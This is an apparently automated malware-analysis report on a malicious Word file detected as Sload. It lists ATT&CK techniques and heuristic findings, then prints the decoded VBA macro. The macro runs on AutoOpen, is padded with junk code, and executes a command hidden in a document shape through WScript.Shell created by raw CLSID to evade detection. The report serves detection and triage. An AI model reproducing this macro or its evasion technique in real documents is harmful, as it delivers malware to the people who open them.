Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
The sample contains VBA macros that instantiate the `WScript.Shell` COM object to execute obfuscated commands via `cmd.exe` and `powershell.exe`. The script attempts to download and execute a second-stage payload, as indicated by the embedded URL and the suspicious command-line arguments. The AutoOpen macro, combined with the invocation of cmd.exe and PowerShell, is a strong indicator of malicious intent.
Heuristics (10)

- ClamAV: Doc.Malware.Sload-6777087-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sload-6777087-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Matched line in script: `Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)` followed by `On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)` followed by `On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script: `Attribute VB_Customizable = True`, `Sub AutoOpen()`, `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7603 bytes |

SHA-256: 80532583611be84b4ded96c42ad949b9959910c190a977a4225b12123859c30a

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 115 of 179 identifiers look randomly generated (e.g. 'iInmDTjaNzv'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iInmDTjaNzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qSFiFV
Case 176593762
RkjqtU = Hex(jDcIW)
UKpACCuqP = Cos(78931746)
WzzUHiJzr = 123866763
Case 124231645
iIjvbtd = Hex(iXSVHQ)
DSjVBYt = Sqr(129297158 / CSng(317194285 - Cos(147563730 - 211019213) + USJijCh + Rnd(44056466 - 285617669)))
HTwmuM = Hex(fcMqEGjLz)
End Select
On Error Resume Next
Select Case OWPZG
Case 123802421
zWvltjwZZ = Hex(oziEl)
KGPjzDfC = Cos(257063776)
zTziDfjZ = 44567978
Case 221779699
FUrRX = Hex(tmEnC)
mFSqmut = Sqr(285893376 / CSng(295667817 - Cos(333459047 - 71990123) + daqBJPJz + Rnd(26382225 - 201521290)))
mYPaw = Hex(PivvqNdl)
End Select
On Error Resume Next
Select Case YJjnPuJk
Case 153121641
EtiXizjpa = Hex(rJWLCvjp)
NNbVluFF = Cos(29281143)
YcAwzPq = 141918544
Case 157170618
pmRncz = Hex(nUlTKU)
KfdYt = Sqr(196387076 / CSng(192712795 - Cos(307972471 - 203113868) + BIrNYv + Rnd(75428042 - 174033635)))
Xuavos = Hex(iRkSJNIz)
End Select
On Error Resume Next
Select Case qCYjcC
Case 74160807
QOKsCizmW = Hex(dkvCzTObI)
hvhOGQ = Cos(296776916)
GYWJzSma = 271880502
Case 336084506
XLGbWFP = Hex(oFESBtu)
Vjwlmp = Sqr(71830139 / CSng(211613722 - Cos(329687637 - 163035359) + lcPXiP + Rnd(16858626 - 246937385)))
aTLJr = Hex(FhBGUPEHR)
End Select
Set ppnZv = Shapes("QqIUpbiD")
On Error Resume Next
Select Case YCaIUWfci
Case 302944051
sYCizskD = Hex(ptmhpNW)
jFwpHVKi = Cos(15537758)
hJCvA = 230079606
Case 69565347
irbpohTrJ = Hex(QtSHAvvZ)
wkDsAujDt = Sqr(176962448 / CSng(301326538 - Cos(291694381 - 20956679) + qiiJrQP + Rnd(145582510 - 107026275)))
iRIqZJ = Hex(zalOO)
End Select
On Error Resume Next
Select Case nmsIMAqzV
Case 145706481
OzcrDIzzi = Hex(uWdAdh)
wwzNUjMsq = Cos(260319119)
kFCbUJXPU = 322612991
Case 113804233
TGJatPOI = Hex(TvwXWitT)
wNUwMY = Sqr(117589001 / CSng(125228753 - Cos(15154373 - 136004325) + ONwhLfG + Rnd(76991288 - 41597964)))
cbiRRK = Hex(Ewadw)
End Select
zkqPqPEG = "" + SVukI + tfTFwQ + chMwVlpj + ppnZv.TextFrame.TextRange.Text + NODuzS + dsKMa
On Error Resume Next
Select Case iSwOR
Case 341340570
bipUEWO = Hex(FNXUpNDd)
vYcELC = Cos(18288008)
UzVXmW = 224753650
Case 174426422
UONOwCwcP = Hex(jhstf)
fStXUQfm = Sqr(52473220 / CSng(237973600 - Cos(151638143 - 300756351) + Trours + Rnd(271479315 - 101128090)))
zWjbv = Hex(VibFq)
End Select
On Error Resume Next
Select Case wlNUXfcjd
Case 222675151
YWwiR = Hex(JVoGzcMMi)
wzjYtJL = Cos(129459040)
wNEjUYIA = 152760006
Case 188780820
rZGTz = Hex(LlzJBI)
JdjuJGOK = Sqr(191839566 / CSng(327543468 - Cos(123613120 - 220592647) + lUiqb + Rnd(269092684 - 235791724)))
iZtPbiwa = Hex(awFOaq)
End Select
On Error Resume Next
Select Case ilRLi
Case 232345182
LdDNz = Hex(jVrwlMim)
ffOfUkmm = Cos(218372567)
DZhCif = 214669908
Case 36710983
cSjii = Hex(QXmuprRV)
FlzDOTYqW = Sqr(339979559 / CSng(314656958 - Cos(47136418 - 10676961) + JQEGjJ + Rnd(90010404 - 312629450)))
jzDMA = Hex(rVlDjwzid)
End Select
On Error Resume Next
Select Case RYPwQaLw
Case 247483045
PwIzM = Hex(QGmPUXQ)
GEfVW = Cos(280939674)
zPnbQZs = 222667677
Case 11454302
KbUwo = Hex(ksRVWNtT)
IGrLvqZui = Sqr(119084423 / CSng(216616246 - Cos(143458019 - 158929839) + DYYkJJwwM + Rnd(118741274 - 121986413)))
dEUDkVThI = Hex(AVGPkj)
End Select
On Error Resume Next
Select Case khHvlEjKo
Case 327114310
FERKB = Hex(MMfwoC)
PGhAza = Cos(59040453)
zilviQ = 293455400
Case 247517069
ZjYmJtnTi = Hex(uLftwisf)
WjMOotH = Sqr(172737929 / CSng(213112172 - Cos(99212125 - 124681621) + UbmYE + Rnd(200867014 - 189808307)))
NtjPq = Hex(ASkpQq)
End Select
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)
On Error Resume Next
Select Case VjJzDHtUX
Case 18897691
ilvjvjmZE = Hex(jsnhw)
mmlZUOGlS = Cos(51671107)
ZVnLvfmRj = 114746456
Case 30553963
TQocppnVS = Hex(MGhlc)
UfJRnlM = Sqr(28140398 / CSng(116834274 - Cos(296290303 - 239254800) + AQRdin + Rnd(122557321 - 63895743)))
lRvimdUI = Hex(dKCJwBHn)
End Select
On Error Resume Next
Select Case OVKiavzpj
Case 221132927
LPrRj = Hex(DZZYrGp)
wZYqKK = Cos(25050622)
NnNWMwJK = 322692278
Case 176774328
wNLlo = Hex(kChWXXP)
SdWYwZX = Sqr(321693798 / CSng(170115082 - Cos(9599548 - 24949137) + JSGQP + Rnd(182175281 - 108129704)))
szlok = Hex(ZHWPqQ)
End Select
On Error Resume Next
Select Case AHHLF
Case 52629287
JlZYZFzUA = Hex(ZcwtdE)
HodTrnjKR = Cos(177297043)
WtEVCRiV = 232654319
Case 5709937
XfIOJT = Hex(cMWDODQi)
RzpOHiJ = Sqr(327815452 / CSng(49306926 - Cos(68893772 - 26929633) + hPIUrsR + Rnd(329664313 - 69038397)))
iPcpORT = Hex(AEYqMXt)
End Select
On Error Resume Next
Select Case FsaXDSBpb
Case 198789829
ipQFEtcG = Hex(ZaEQTo)
QXzotUU = Cos(304001646)
QfhID = 314956561
Case 324917293
TrpjPpXad = Hex(PfoJEOslR)
pmKVVvo = Sqr(91034715 / CSng(310936736 - Cos(331512196 - 89200067) + cGzcwqA + Rnd(221364631 - 188067519)))
PdEOVG = Hex(SQSdVIj)
End Select
Const rVrIS = 0
On Error Resume Next
Select Case ouBKZL
Case 267343171
jfQdhYO = Hex(TiNCHsX)
jjLWdjia = Cos(209682394)
batQK = 303397753
Case 44012612
oLnnt = Hex(KiPJW)
GvXSa = Sqr(297750185 / CSng(64046 - Cos(117659341 - 315801623) + zpzcz + Rnd(261847519 - 239648332)))
XTvFE = Hex(vwnEMz)
End Select
On Error Resume Next
Select Case upFEnBI
Case 327947516
sDKLwjJE = Hex(MPnsmkwfd)
AbNZZ = Cos(237618905)
Pqfkk = 118979471
Case 210404175
rFDuaXq = Hex(HlqiBD)
GHXCwNf = Sqr(196367284 / CSng(243951550 - Cos(179644608 - 321163522) + SYFbzH + Rnd(106782011 - 306771080)))
ulCjJPF = Hex(jBAMVZdM)
End Select
zpFjRBW.Run# zkqPqPEG, rVrIS
On Error Resume Next
Select Case HrzvRn
Case 253475972
thwcnb = Hex(LDkanjDvn)
VXJLA = Cos(214466582)
RlTXk = 187051212
Case 231717698
QLYriIobl = Hex(WfcriDvJ)
vQcFtBtKB = Sqr(49048105 / CSng(144659092 - Cos(177219579 - 175907146) + jWXfE + Rnd(35559187 - 298468547)))
vYfdBaZH = Hex(cainio)
End Select
End Sub